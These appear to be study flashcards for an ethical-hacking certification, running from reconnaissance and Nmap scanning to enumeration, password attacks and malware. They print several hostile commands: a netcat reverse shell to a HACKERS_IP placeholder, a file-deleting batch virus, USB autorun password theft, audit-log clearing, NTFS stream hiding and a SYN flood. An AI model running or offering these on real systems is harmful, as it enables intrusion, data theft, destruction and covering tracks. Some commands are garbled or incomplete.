Important Tools by steps Flashcards
Phase 1: Footprinting
Major search engines such as Google have an alert system that notifies you of any updates that occur
Archive.org (aka The Wayback Machine) allows you to find archived copies of websites from which you can extract information
Netcraft - suite of tools used to obtain web server version, IP address, subnet data, OS info, subdomain info (go to netcraft.com > what’s the site running?)
Link Extractor - this tool locates & extracts the internal and external URLs for a given location
Maltego - an app that illustrates the relationships between people, groups, companies, etc. (illustrates the dangers of social networking)
Finance websites - can get company officers, profiles, shares, competitors
Social Media
Job sites
http://whoreadme.com –> allows you to track emails & provides info on OS, browser type, location, etc
Competitive analysis - (establishing what makes your product or service unique; looking at what competitors are doing to see how your target is moving) Tools such as EDGAR (reports), LexisNexis (news), BusinessWire (status), CNBC (future plans)
Google Hacking - Examples of operators include:
1) cache:
2) link: - finds websites that have linked to the page
3) info:
4) site:
5) allintitle: - returns websites w/ the specified words in their title
6) allinurl:
7) filetype:
For more: www.exploit-db.com/google-dorks/
NW info - Whois - find domain name, IP info, etc
Tracert - follow the path of traffic from one point to another, find relative performance and latency between hops; find server names, etc
Phase 2: Scanning
Wardialing - dialing into modems (top apps –> ToneLoc, THC-SCAN, NIKSUN’s PhoneSweep)
Wardriving - driving around w/ a wireless-enabled laptop or device to find access points (top apps –> AirSnort (cracks WEP), AirSnare (alerts when an unapproved machine connects to your wireless NW), Kismet (Linux, wireless NW detector, sniffer), NetStumbler (wireless NW detector), inSSIDer (wireless NW detector, mapper of access points))
Pinging - cmd prompt –> ping OR ping OR Nmap.org - used for port scanning –> NMAP -sP -v
Ping sweep - sweeping through a range of IPs to find live hosts –> nMap
nmap -sP -PE -PA
nmap -sn -PE -PA21,23,80,3389 192.168.10.1-50
Xmas tree scan in Nmap (sending SYN, ACK, URG, FIN, RST flags to the client to see if a port is open or closed) –> NMAP -sX -v
FIN scan - only fin packet sent –>
NMAP -sF
Null scan - frame sent with no flags set –>
NMAP -sN
Ack Scan - probe to tell whether or not firewall or router is in use –>
NMAP -sA -P0
What to do if packet filters, firewalls, or other devices pick up evidence of your attack? FRAGMENT PACKETS
NMAP -sS -T4 -A -f -v
other tools –> Fragtest, Fragroute (both command-line tools)
Port scanning - after finding live hosts, scan for open ports
packet crafting - making custom packets to send & see how target responds (gain info)
–> HPING2 and HPING3 - command-line only; create custom packets for testing
Create an ACK packet & send it to port 80:
Hping3 -A -p 80
Create a SYN scan against different ports:
Hping3 -8 50-56 -S -v //-S sets the SYN flag (lowercase -s would set the base source port instead)
Create packet w/ FIN, URG -p 80
Banner Grabbing - to determine info about services running on a system –> Use Telnet
telnet 80 //once connected, send the request:
HEAD / HTTP/1.0
–> Netcraft, Xprobe (linux), p0f (linux)
Countermeasure of banner grabbing - disable or change server info –> IIS Lockdown, ServerMask, etc
hide file extensions to hide technology used to generate pages
tools –> PageXchanger
Vulnerability Scanning –>
Tools –> Nmap, Rapid7, Retina, etc
Setup proxy to hide self –>
1) Find your IP –> whatismyip.com
2) Search for proxies with IP and port #
3) Change proxy settings in browser
4) Find your IP again
Tools –> TOR (The Onion Router) used to improve privacy & security on the internet; packets cannot be traced; encrypts traffic
Phase 3: Enumeration
1) Extracting info from Email IDs
2) Obtaining info through Default PWs
3) Using Brute-force attacks on Directory Services
4) Exploiting SNMP
5) Working w/ DNS Zone Transfers
6) Capturing User Groups
*Using nbtstat to exploit NetBIOS
*Exploit Null Session
Attach to the system by:
net use \\hostnameorIP\ipc$ "" /user:""
View the shares available:
net view \\hostnameorIP
Once an attacker has this list of shares, the next step is to connect to a share & view the data:
net use s: \\hostnameorIP\sharedFolderName
- SuperScan - many functions
- PsTools Suite - many functions
*SNMP enumeration tools –> SNMPUtil, SolarWinds’ IP NW Browser, SNScan (detects devices on a NW enabled for SNMP)
Enum4linux - allows for extraction of info where Samba is in use
Samba - SW that can be run on a platform to share files
LDAP enumeration tools
- JXplorer
- LDAP Admin Tool
- LDAP Account Mgr
- LEX (The LDAP Explorer)
- Active Directory Explorer
- LDAP Administration Tool
- LDAP search
- Active Directory Domain Services Mgmt Pack
- LDAP Browser/Editor
NTP Enumeration
The following commands can be used against an NTP server:
1) ntpdate
2) ntptrace
3) ntpdc
4) ntpq
SMTP Enumeration
Using telnet & VRFY in cmd:
//use the telnet command to attach to the target & extract info; use the VRFY command to check if a specific user ID is present
telnet
//connected
VRFY username
//response
Using EXPN:
telnet 25
//connect
EXPN
Using RCPT TO:
telnet 25
MAIL FROM: link
//response
RCPT TO: link
//response
Other Tools for SMTP enumeration include: TamoSoft’s Essential NetTools or NetScanTool Pro
Phase 4: System Hacking
Sniffing tool - Wireshark
1) Passive Online Attacks - sitting back & listening (sniffing tools such as Wireshark, man-in-the-middle attacks, replay attacks)
2) Active Online Attacks - deeper engagement w/ targets w/ intent to break PW (i.e. password guessing, trojan/spyware/key loggers, hash injection, phishing)
3) Offline Attacks - preying on the weaknesses of how PWs are stored; (i.e. precomputed hashes, distributed NW attacks, rainbow attacks)
4) Nontechnical Attacks aka non-electronic attacks - moving from offline into the real world (i.e. shoulder surfing, social engineering, dumpster diving)
Offline Attack - Extracting hashes from a system:
1) Open cmd
2) Type pwdump7.exe //displays hashes
3) Type pwdump7.exe > C:\hash.txt
4) Using Notepad, browse to the C drive & open the hash.txt file to view the hashes
Generating Rainbow tables - winrtgen (gui-based generator)
Rainbow Crack: Program used to compare Rainbow table with Hash files
Default Passwords: If an attacker can determine that you have not changed the default password on a given piece of equipment or system you may have, they can look up your default PW at the following sites: http://cirt.net, default-password.info, defaultpassword.us, passwordsdatabase.com, w3dr.net, virus.org, open-sez.me, securityoverride.org, routerpasswords.com, fortypoundhead.com
USB Password Theft
Involves embedding a password-stealing application on a USB drive & physically plugging the drive into a target system
USB Password Theft application (steps to steal)
1) Obtain a PW-hacking utility such as pspv.exe
2) Copy it to USB
3) Create a Notepad file called launch.bat containing the following lines:
[autorun]
en = launch.bat
Start pspv.exe /s passwords.txt
4) Save launch.bat to the USB drive
//pspv.exe = protected-storage PW viewer, saves PWs contained in Internet Explorer & other applications
Mitigation: disabling autoplay of USB devices, which is on by default
Apps that may decipher hashes include: Ophcrack, L0phtcrack, pwdump
Privilege Escalation: Change password
Identify an account that has desired access & then change the password using the following tools:
- Active@ Password Changer
- Trinity Rescue Kit
- ERD Commander
- Windows Recovery Environment (WinRE)
- Password Resetter
Trinity Rescue Kit (TRK) Linux distribution (for Windows & Linux); Can be booted from CD or flash drive
1) cmd line: winpass -u Administrator
2) Choose file system
3) Set Password
4) Type: init 0, to shut down TRK Linux
5) Reboot
//Planting backdoors or running apps on a remote system
- PsTools suite (suite of tools to ease system administration)
- PsExec is one of them; similar to Telnet but does not need installation & can be run local or remotely; Commands include:
psexec \\zelda cmd //launches an interactive cmd prompt on the system named \\zelda
psexec \\zelda ipconfig /all //executes ipconfig on the remote system with the /all switch & outputs locally
psexec \\zelda -c rootkit.exe //copies the program rootkit.exe to the remote system & executes it interactively
psexec \\zelda -u administrator -c rootkit.exe //copies the program rootkit.exe to the remote system & executes it interactively using the admin acct on the remote system
Running trojans, rootkits, and backdoors is a good idea;
More programs to attach to a remote system:
- PDQ Deploy //helps w/ deploying SW to a single system or multiple
- RemoteExec //Works like PsExec, but makes it easier to restart, reboot, & manipulate folders on the system
- DameWare //remotely administer & control a system, may not be detected by antivirus utilities
//Covering your tracks
DISABLING AUDITING - Auditing is designed to allow for detection & tracking of selected events on a system; we want to alter the way events are logged on the target system;
How to disable auditing by running a command in Windows:
auditpol \ /clear
Additional tools to surgically remove entries from the Windows Security Log:
-Dumpel, Elsave, WinZapper, CCleaner, Wipe, MRU-Blaster, Tracks Erase Pro, Clear My History
DATA HIDING - hide files placed on the system;
ALTERNATE DATA STREAMS (ADS) (only on NTFS) - major security issue w/ ADS because it is nearly a perfect mechanism for hiding data; almost impossible to find; the data can lie in wait until the attacker decides to run it later; allows you to hide files within existing files
Creating an ADS:
type triforce.exe > smoke.doc:triforce.exe //executing this command hides triforce.exe behind the file smoke.doc; then delete the original triforce.exe
Retrieve the file:
start smoke.doc:triforce.exe //opens hidden file & executes
Tools that can detect those hidden files:
- SFIND //used to find streamed files
- LNS //finding ADS streamed files
- Tripwire //detects changes in files; can detect ADS
MALWARE
CREATING A VIRUS
Do not execute this code because it could cause a lot of damage
1) Create a batch file called virus.bat using Notepad
2) Enter the following code:
@echo off
Del c:\windows\ystem*.*
Del c:\windows*.*
3) Save virus.bat
4) From cmd, use bat2com to convert virus.bat into virus.com
Another way is to use JPS Virus Maker/TeraBIT Virus Maker 2.8 SE (Has GUI)
SHEEP DIP SYSTEM
used to investigate, analyze & defend against malware; it is a computer specifically configured to analyze files; the computer is stripped down & includes only those services & apps needed to test the SW
DETECTING TROJANS & VIRUSES
Tools such as nmap, netstat (not real-time), TCPview (real-time, open ports) to detect open ports & listen for connections on the system
cmd: netstat -an //lists all ports & listening for connections
TOOLS FOR CREATING TROJANS
-let me rule, recub, phatbot, amitis, zombam.b, HTTPRat, Beast, Hard-disk killer, back orifice, BO2K
Tip when creating trojans: TCP vs UDP when choosing protocol to run open port for access to system
UDP is typically used to traverse firewall or security architecture
The port used is port 80 bc it is usually open
Using BO2K
used to build a server & install that server on the victim’s computer to gain access
The BO2K executable needs to be run on the target system; the application runs an executable called Umgr32.exe which may be masked as a different process in Task Manager; if stealth was not configured, the app appears as Remote Administration Service
WRAPPER programs //merges payload with harmless executable: EliteWrap, Saran Wrap, Trojan Man, Teflon Oil Patch, Restorator, Firekiller 2000
Trojan construction kits: Trojan construction kit, Senna Spy, Stealth Tool
TOOLS to Exploit Covert Channels //Allows you to transmit info in unusual ways: Loki, ICMP backdoor, 007Shell, B0CK, Reverse World Wide Web Tunneling Shell, AckCmd
Keylogger Tools: IKS SW keylogger, Ghost Keylogger, Spector Pro, Fakegina
USING NETCAT //Cmd utility used to read info from connections using TCP or UDP & do port redirection
*other tools: Datapipe, Fpipe
1) nc -n -v -l -p 80 //set up the listener on system
2) nc -n HACKERS_IP 80 -e cmd.exe //redirect traffic to Hacker’s system
3) Now hacker has victim’s system
Netcat can also do port scanning & place files on target system
nc -v -z -w1 IP_address - //used to scan ports
List of flags for NetCat:
Page 398
Sniffers
//Captures traffic
Besides sniffers, there are HW protocol analyzers which plug directly into the NW at the HW level & can monitor traffic without manipulating it
SNIFFING TOOLS
Wireshark (number one); TCPdump; Windump; Omnipeek; Dsniff; EtherApe; MSN Sniffer; NetWitness NextGen
MAC FLOODING //to allow sniffing of NW, we need to make the switch think it is a hub, so flood CAM table w/ MAC addresses
Tools include: Macof;
OVERFLOWING A CAM TABLE USING UBUNTU
Standard repositories store the tools needed for a successful attack; obtained with APTITUDE
1) su to root
2) aptitude install dsniff //install DSNIFF (include Macof)
3) enter cmd: macof //will start flooding CAM table
4) Ctrl+Z to stop
ARP POISONING //attempts to contaminate NW w/ improper gateway mappings
Tools: Ettercap, Cain & Abel, Arpspoof
Cain and Abel is known for ARP poisoning, password cracking, and sniffing
Good place for tools
www.sectools.org
Performing a SYN Flood
Tool: HPING3 //Linux utility used to craft custom packets such as packets that have specific flags activated
1) Have Wireshark up & running; get sniffer started;
2) In your BackTrack box, open cmd; type hping3 for a list of commands
3) hping3 --flood -p 80 -S 192.168.1.2 //flood SYN packets
4) Check out the traffic
5) Go back to BackTrack & terminate cmd with ctrl+C
Tools for creating Botnets
Shark, Plugbot, Poison Ivy, Low Orbit Ion Cannon (LOIC) (the easiest tool)
DoS and DDoS Tools
DoS Tools: DoSHTTP, UDP Flood, Jolt2, Targa
DDoS Tools: Trinoo, LOIC Low Orbit Ion Cannon (easiest tool), TFN2K, Stacheldraht
Session Hijack
Performing a MiTM Attack //Page 543
Password Cracking
Brutus //Page 576
Tools available to add, check, or list security/vulnerabilities
www.openssl.org
www.owasp.org
nessus.org
WinSSLMiM
stunnel.org
Locating Databases on the NW
SQLPing 3.0 is designed to discover DBs
SQLRecon
After locating a database, SQLPing can be used to crack PWs
Link for pen testing tools
http://vulnerabilityassessment.co.uk/